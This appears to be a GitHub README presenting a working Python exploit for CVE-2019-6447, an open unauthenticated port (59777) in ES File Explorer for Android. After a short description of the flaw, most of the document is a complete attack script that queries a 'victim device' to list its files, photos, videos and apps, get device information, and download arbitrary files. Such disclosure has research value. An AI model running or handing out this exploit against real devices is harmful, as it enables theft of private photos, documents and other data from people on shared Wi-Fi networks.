/EsFileExplorer-CVE-2019-6447

Exploiting Android Vulnerability in ES File Explorer

EsFileExplorer-CVE-2019-6447

Exploiting Android Vulnerability in ES File Explorer

Vulnerability

The ES file explorer was created by ES worldwide, which is a part of DO Global and is based in China. This ES file explorer is only available for use on mobile devices that run the Android operating system. At the moment, ES File Explorer has been downloaded a total of more than 100 million times. This application is Android's famous file explorer, therefore it gets a lot of attention. On the other hand, in 2019, researchers specializing in cybersecurity discovered a vulnerability in ES File Explorer 4.1.9.7.4 version. Attackers who are able to exploit that vulnerability are in a place to collect all of the sensitive user data that is saved in ES file explorer. This includes photographs, videos, voice recordings, documents, and other data types.

Vulnerability Description

Through version 4.1.9.7.4, the ES File Explorer File Manager application for Android enables, remote attackers to read arbitrary files or run apps on a local Wi-Fi network by making queries to the TCP port 59777. After the ES application has been launched just once, this TCP port will remain open and will reply to unauthenticated application/json data that is sent over HTTP.

Affected Version

4.1.9.7.4 Version

Everytime a user is launching the app, a HTTP server is started. This server is opening locally the port 59777:
angler:/ # netstat -ap | grep com.estrongs
tcp6       0      0 :::59777                :::*                    LISTEN      5696/com.estrongs.android.pop

Proof Of Concept(POC) Features

  • List all the files in the sdcard in the victim device
  • List all the pictures in the victim device
  • List all the videos in the victim device
  • List all the audio files in the victim device
  • List all the apps installed in the victim device
  • List all the system apps installed in the victim device
  • List all the phone apps installed in the victim device
  • List all the apk files stored in the sdcard of the victim device
  • List all the apps installed in the victim device
  • Get device info of the victim device
  • Pull a file from the victim device
  • Launch an app of your choice
  • Get the icon of an app of your choice

Payload

import requests
import json
import ast
import sys

if len(sys.argv) < 3:
    print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")
    sys.exit(1)

url = 'http://' + sys.argv[2] + ':59777'
cmd = sys.argv[1]
cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo']
listCmds = cmds[:9]
if cmd not in cmds:
    print("[-] WRONG COMMAND!")
    print("Available commands : ")
    print("  listFiles         : List all Files.")
    print("  listPics          : List all Pictures.")
    print("  listVideos        : List all videos.")
    print("  listAudios        : List all audios.")
    print("  listApps          : List Applications installed.")
    print("  listAppsSystem    : List System apps.")
    print("  listAppsPhone     : List Communication related apps.")
    print("  listAppsSdcard    : List apps on the SDCard.")
    print("  listAppsAll       : List all Application.")
    print("  getFile           : Download a file.")
    print("  getDeviceInfo     : Get device info.")
    sys.exit(1)

print("\n==================================================================")
print("|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |")
print("|                Coded By : Nehal a.k.a PwnerSec                 |")
print("==================================================================\n")

header = {"Content-Type" : "application/json"}
proxy = {"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"}

def httpPost(cmd):
    data = json.dumps({"command":cmd})
    response = requests.post(url, headers=header, data=data)
    return ast.literal_eval(response.text)

def parse(text, keys):
    for dic in text:
        for key in keys:
            print(f"{key} : {dic[key]}")
        print('')

def do_listing(cmd):
    response = httpPost(cmd)
    if len(response) == 0:
        keys = []
    else:
        keys = list(response[0].keys())
    parse(response, keys)

if cmd in listCmds:
    do_listing(cmd)

elif cmd == cmds[9]:
    if len(sys.argv) != 4:
        print("[+] Include file name to download.")
        sys.exit(1)
    elif sys.argv[3][0] != '/':
        print("[-] You need to provide full path of the file.")
        sys.exit(1)
    else:
        path = sys.argv[3]
        print("[+] Downloading file...")
        response = requests.get(url + path)
        with open('out.dat','wb') as wf:
            wf.write(response.content)
        print("[+] Done. Saved as `out.dat`.")

elif cmd == cmds[10]:
    response = httpPost(cmd)
    keys = list(response.keys())
    for key in keys:
        print(f"{key} : {response[key]}")

Demonstration

Demo

Contact Me

Follow me on Twitter!
Connect with me on LinkedIn!